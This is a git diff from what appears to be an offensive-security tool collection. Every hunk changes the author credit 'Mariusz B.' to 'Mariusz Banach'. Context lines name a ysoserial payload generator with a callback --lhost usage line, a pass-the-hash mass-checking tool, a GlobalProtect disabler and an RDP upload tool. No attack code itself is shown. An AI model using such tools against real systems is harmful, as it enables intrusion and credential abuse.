a/web/post.php +++ b/web/post.php @@ -14,7 +14,7 @@ * to add forced redirection to the target site. * * Authors: - * Mariusz B. / mgeeky + * Mariusz Banach / mgeeky * Jakub M. / unkn0w * * Version: diff --git a/web/py-collaborator/README.md b/web/py-collaborator/README.md index cec784b..3268877 100644 --- a/web/py-collaborator/README.md +++ b/web/py-collaborator/README.md @@ -80,7 +80,7 @@ hostname|23:55|~/dev/py-collaborator # python3.7 py-collaborator-server.py -d :: Cracking the Lens pingback responding server Responds to every Out-of-band request correlating them along the way - Mariusz B. / mgeeky '16-18, + Mariusz Banach / mgeeky '16-18, [-] You shall specify all needed MySQL connection data either via program options or config file. [+] Database initialized. diff --git a/web/py-collaborator/py-collaborator-server.py b/web/py-collaborator/py-collaborator-server.py index d18ba16..2892881 100644 --- a/web/py-collaborator/py-collaborator-server.py +++ b/web/py-collaborator/py-collaborator-server.py @@ -211,7 +211,7 @@ def parseOptions(argv): print(''' :: Cracking the Lens pingback responding server Responds to every Out-of-band request correlating them along the way - Mariusz B. / mgeeky '16-18, + Mariusz Banach / mgeeky '16-18, ''') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]') diff --git a/web/reencode.py b/web/reencode.py index 5ca70a8..4afa388 100644 --- a/web/reencode.py +++ b/web/reencode.py @@ -18,7 +18,7 @@ # - jwt # - anytree # -# Mariusz B., 2018 +# Mariusz Banach, 2018 # import os diff --git a/web/ysoserial-generator.py b/web/ysoserial-generator.py index 514a626..9e3bac0 100755 --- a/web/ysoserial-generator.py +++ b/web/ysoserial-generator.py @@ -26,7 +26,7 @@ # $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000 # :: ysoserial payloads generation helper # Helps generate many variations of payloads to try against vulnerable application. -# Mariusz B. / mgeeky '18, +# Mariusz Banach / mgeeky '18, # v0.1 # # [+] Command within payload: @@ -55,7 +55,7 @@ # # # Author: -# Mariusz B., '18-19 / +# Mariusz Banach, '18-19 / # import os @@ -379,7 +379,7 @@ def parseOptions(argv): print(''' :: ysoserial payloads generation helper Helps generate many variations of payloads to try against vulnerable application. - Mariusz B. / mgeeky '18, + Mariusz Banach / mgeeky '18, v{} '''.format(VERSION)) diff --git a/windows/GlobalProtectDisable.cpp b/windows/GlobalProtectDisable.cpp index b19a611..63a7285 100644 --- a/windows/GlobalProtectDisable.cpp +++ b/windows/GlobalProtectDisable.cpp @@ -12,7 +12,7 @@ * Compilation: * C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++ * - * Mariusz B. / mgeeky, '18-'20 + * Mariusz Banach / mgeeky, '18-'20 **/ #include "windows.h" diff --git a/windows/README.md b/windows/README.md index 8981033..9c08920 100644 --- a/windows/README.md +++ b/windows/README.md @@ -13,7 +13,7 @@ ``` :: findSymbols.py - Finds PE Import/Exports based on supplied filters. - Mariusz B. / mgeeky, '21 + Mariusz Banach / mgeeky, '21 usage: .\findSymbols.py [options] @@ -117,7 +117,7 @@ PS> python3 rdpFileUpload.py -v -f certutil README.md Takes an input file/folder and retypes it into focused RDP session window. That effectively uploads the file into remote host over a RDP channel. - Mariusz B. / mgeeky '20, (@mariuszbit) + Mariusz Banach / mgeeky '20, (@mariuszbit) [+] Will upload file's contents: "README.md" diff --git a/windows/findSymbols.py b/windows/findSymbols.py index 8bfd197..2667bd1 100644 --- a/windows/findSymbols.py +++ b/windows/findSymbols.py @@ -9,7 +9,7 @@ # - module matching name # - module NOT matching name # -# Mariusz B. / mgeeky, '21 +# Mariusz Banach / mgeeky, '21 # # @@ -436,7 +436,7 @@ def main(): out(''' :: findSymbols.py - Finds PE Import/Exports based on supplied filters. - Mariusz B. / mgeeky, '21 + Mariusz Banach / mgeeky, '21 ''') diff --git a/windows/pth-carpet.py b/windows/pth-carpet.py index 3c562f0..fd28e84 100644 --- a/windows/pth-carpet.py +++ b/windows/pth-carpet.py @@ -23,7 +23,7 @@ # $ ./pth-carpet.py machines.txt pwdump # # coded by: -# Mariusz B., 2016 / mgeeky +# Mariusz Banach, 2016 / mgeeky # version 0.2 # # Should be working on Windows boxes as well as on Linux ones. @@ -172,7 +172,7 @@ def worker(stopevent, pwdump, machine): def main(): global OPTIONS - print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz B., 2016\n', 'white', attrs=['bold'])) + print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold'])) parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool') parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts') diff --git a/windows/rdpFileUpload.py b/windows/rdpFileUpload.py index 3655ac7..fc99f8b 100644 --- a/windows/rdpFileUpload.py +++ b/windows/rdpFileUpload.py @@ -21,7 +21,7 @@ # - tqdm # # Author: -# Mariusz B. / mgeeky (@mariuszbit), '20 +# Mariusz Banach / mgeeky (@mariuszbit), '20 # # @@ -313,7 +313,7 @@ def parseOptions(argv): Takes an input file/folder and retypes it into focused RDP session window. That effectively uploads the file into remote host over a RDP channel. - Mariusz B. / mgeeky '20, (@mariuszbit) + Mariusz Banach / mgeeky '20, (@mariuszbit) ''')